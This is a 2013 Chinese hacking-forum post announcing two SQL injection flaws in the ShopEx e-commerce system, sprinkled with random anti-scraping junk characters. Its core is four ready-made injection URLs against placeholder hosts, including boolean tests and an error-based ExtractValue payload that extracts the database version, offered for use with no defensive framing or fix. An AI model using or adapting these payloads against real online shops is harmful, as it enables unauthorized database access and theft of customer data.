找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1837|回复: 0
打印 上一主题 下一主题

shopex通杀注入0day漏洞两处

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-4 16:20:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…- p9 H2 @: V' a6 @1 M
2 y$ \1 q* a& C1 S8 Q0 _
好吧,我扯远了~~# c" Y9 J7 }2 e2 g
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~6 @' w* i9 E* E; ?" d
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
. t8 _) k' f2 i' J, F' O7 M
  \6 ?) L1 d% T& d: hhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
- O- [3 Q1 s- ^  ^0 L
$ r' ]' e% Q; L2 fhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html6 U9 Q4 [! J( ?% j; Y
1 r: r6 h2 Q( f( o$ r; W! o- L
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html+ K8 @/ ^6 W- U2 V2 b$ ?, m, T& i
0 g+ T+ `8 W$ l
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html2 {/ ?- L- _8 O. K% i* X

4 B. Q% e9 s* n5 }3 O, c
9 ?' }# v# c* J8 W3 Z. Y一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。0 j! c( S3 O$ D& P: F% F2 x
如何注入就不多说了,10多年的东西了…不会也会了…
+ _* O8 \4 f0 P" P. l$ I' R
. P' c' T5 D' _3 |4 l% i  a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表